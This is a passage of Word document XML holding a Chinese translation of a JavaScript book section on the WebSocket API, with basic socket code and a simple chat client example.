        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>You may need to start Chrome with--unlimited-quota-for-indexeddb</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/i</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/body</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/html</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="565" w:name="22_9_WebTao_Jie_Zi_"/>
      <w:r>
        <w:t>22.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>套接字</w:t>
      </w:r>
      <w:bookmarkEnd w:id="565"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍过客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码如何通过网络进行通信。该章中的例子都使用</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>协议，这也意味着它们受限于</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>协议的特性：它是一种无状态的协议，由客户端请求和服务端响应组成。</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>实际上是相对比较特殊的网络协议。大多数基于因特网（或者局域网）的网络连接通常都包含长连接和基于</w:t>
      </w:r>
      <w:r>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:t>套接字的双向消息交换。让不信任的客户端脚本访问底层的</w:t>
      </w:r>
      <w:r>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:t>套接字是不安全的，但是</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket API</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一种安全方案：它允许客户端代码在客</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>户端和支持</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>协议的服务器</w:t>
      </w:r>
      <w:r>
        <w:t>端创建双向的套接字类型的连接。这让某些网络操作会变得更加简单。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>协议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要通过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>，只须了解这里要介绍的</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket API</w:t>
      </w:r>
      <w:r>
        <w:t>。其中并没有用于书写一个</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>服务器的服务端</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，但是本节会有一个简单服务器例子，该例子使用</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>12.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）和第三方</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>服务器库来实现。客户端和服务器端的通信是通过</w:t>
      </w:r>
      <w:r>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:t>套接字长连接实现的，其遵循</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>协议定义的规则。关于</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>协议的细节这里不做详细介绍，但是，值得注</w:t>
      </w:r>
      <w:r>
        <w:t>意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>WebScoket</w:t>
      </w:r>
      <w:r>
        <w:t>是经过精心设计的协议，实现让</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器能够很容易地同时处理同一端口上的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>连接和</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>连接。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>很多浏览器提供商都实现了</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>。但是，由于发现早期草案版本的</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>协议有重要的安全漏洞，因此，一直到撰写本书时，有些浏览器在安全版本的协议未标准化之前，都将它们支持的</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>功能关闭了。比如，在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 4</w:t>
      </w:r>
      <w:r>
        <w:t>中，要启用</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>功能，需要访问</w:t>
      </w:r>
      <w:r>
        <w:t>about:config</w:t>
      </w:r>
      <w:r>
        <w:t>页面，然后将配置变量</w:t>
      </w:r>
      <w:r>
        <w:t>"network.websocket.ov</w:t>
      </w:r>
      <w:r>
        <w:t>erride-security-block"</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>WebSocket API</w:t>
      </w:r>
      <w:r>
        <w:t>的使用非常简单。首先，通过</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建一个套接字：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var socket=new WebSocket("ws://ws.example.com:1234/resource");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>WebSocket()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数的参数是一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，该</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>ws://</w:t>
      </w:r>
      <w:r>
        <w:t>协议（或者类似于</w:t>
      </w:r>
      <w:r>
        <w:t>https://</w:t>
      </w:r>
      <w:r>
        <w:t>用于安全链接的</w:t>
      </w:r>
      <w:r>
        <w:t>wss://</w:t>
      </w:r>
      <w:r>
        <w:t>协议）。该</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>指定要连接的主机，还有可能指定端口（</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>使用和</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t>一样的默认端口）和路径或者资源。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>创建了套接字之后，通常需要在上面注册一个事件处理程序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>socket.onopen=function(e){/*</w:t>
      </w:r>
      <w:r>
        <w:t>套接字已经连接</w:t>
      </w:r>
      <w:r>
        <w:t>*/};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>socket.onclose=function(e){/*</w:t>
      </w:r>
      <w:r>
        <w:t>套接字已经关闭</w:t>
      </w:r>
      <w:r>
        <w:t>.*/};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>socket.onerror</w:t>
      </w:r>
      <w:r>
        <w:t>=function(e){/*</w:t>
      </w:r>
      <w:r>
        <w:t>出错了</w:t>
      </w:r>
      <w:r>
        <w:t>*/};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>socket.onmessage=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var message=e.data;/*</w:t>
      </w:r>
      <w:r>
        <w:t>服务器发送一条消息</w:t>
      </w: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为了通过套接字发送数据给服务器，可以调用套接字的</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>socket.send("Hello,server!");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当前版本的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">WebSocket </w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>仅支持文本消息，并且必须以</w:t>
      </w:r>
      <w:r>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:t>编码形式的字符串传递给该消息。然而，当前</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>协议还包含对二进制消息的支持，未来版本的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>可能会允许在客户端和</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>服务器端进行二进制数据的交换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当完成和服务器的通信之后，可以通过调用</w:t>
      </w:r>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来关闭</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>完全是双向的，并且一旦建立了</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>连接，客户端和服务器端都可以在任何时候互相传送消息，与此同时，这种通信机制采用的不是请求和响应的形式。每个基于</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>的服务都要定义自己的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>子协议</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，用于在客户端和服务器端传输数据。慢慢的，这些</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>子协议</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>也可能发生演变，可能最终要求客户端和服务器端需要支持多个版本的子协议。幸运的是，</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>协议包含一种协商机制，用于选择客户端和服务器端都能</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>理解</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的子协议。可以传递一个字符串数组给</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。服务器端会将该数组作为客户端能够理解的子协议列表。然后，它会选择其中一个使用，并将它传递给客户端。一旦连接建立之后，客户端就能够通过套接字的</w:t>
      </w:r>
      <w:r>
        <w:t>protocol</w:t>
      </w:r>
      <w:r>
        <w:t>属性检测当前在使用的是哪种子协议。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>18.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　节介绍了</w:t>
      </w:r>
      <w:r>
        <w:t>EventSo</w:t>
      </w:r>
      <w:r>
        <w:t>urce API</w:t>
      </w:r>
      <w:r>
        <w:t>，并通过一个在线聊天的客户端和服务器展示了这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>如何使用。有了</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>，写这类应</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>用就变得更加容易了。例</w:t>
      </w:r>
      <w:r>
        <w:t>22-16</w:t>
      </w:r>
      <w:r>
        <w:t>就是一个简单的聊天客户端：它和例</w:t>
      </w:r>
      <w:r>
        <w:t>18-5</w:t>
      </w:r>
      <w:r>
        <w:t>很像，不同的是它采用了</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>来实现双向通信，而没有使用</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>来获取消息以及</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>来发送消息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-16</w:t>
      </w:r>
      <w:r>
        <w:t>：基于</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>的聊天客户端</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.onload=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>关心一些</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>细节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var nick=prompt("Enter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> your nickname");//</w:t>
      </w:r>
      <w:r>
        <w:t>获取用户昵称</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var input=document.getElementById("input");//</w:t>
      </w:r>
      <w:r>
        <w:t>查找</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>input.focus();//</w:t>
      </w:r>
      <w:r>
        <w:t>设置光标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>打开一个</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>，用于发送和接收聊天消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>假设下载的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器作为</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>服务器运作，并且使用同样的主机名和端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>只是协议由</w:t>
      </w:r>
      <w:r>
        <w:t>htttp://</w:t>
      </w:r>
      <w:r>
        <w:t>变成</w:t>
      </w:r>
      <w:r>
        <w:t>ws://</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var socket=new WebSocket("ws://"+location.host+"/");//</w:t>
      </w:r>
      <w:r>
        <w:t>下面展示</w:t>
      </w:r>
      <w:r>
        <w:t>了如何通过</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>从服务器获取消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>socket.onmessage=function(event){//</w:t>
      </w:r>
      <w:r>
        <w:t>当收到一条新消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var msg=event.data;//</w:t>
      </w:r>
      <w:r>
        <w:t>从事件对象中获取消息内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var node=document.createTextNode(msg);//</w:t>
      </w:r>
      <w:r>
        <w:t>将它标记为一个文本节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var div=document.createElement("div");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>div.appendChild(node);//</w:t>
      </w:r>
      <w:r>
        <w:t>将文本节点添加到该</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.body.i</w:t>
      </w:r>
      <w:r>
        <w:t>nsertBefore(div,input);//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>前添加该</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>input.scrollIntoView();//</w:t>
      </w:r>
      <w:r>
        <w:t>确保输入框可见</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>下面展示了如何通过</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>发送消息给服务器端</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>input.onchange=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>当用户敲击回车键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var msg=nick+":"+input.value;//</w:t>
      </w:r>
      <w:r>
        <w:t>用户昵称加上用户的输入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>socket.send(msg);//</w:t>
      </w:r>
      <w:r>
        <w:t>通过套接字传递该内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>input.value="";//</w:t>
      </w:r>
      <w:r>
        <w:t>等待更多内容的输入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>聊天窗口</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>很简单，一个宽的文本输入域</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>新的聊天消息会插入在该元素中</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>input id="input"style="width:100%"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
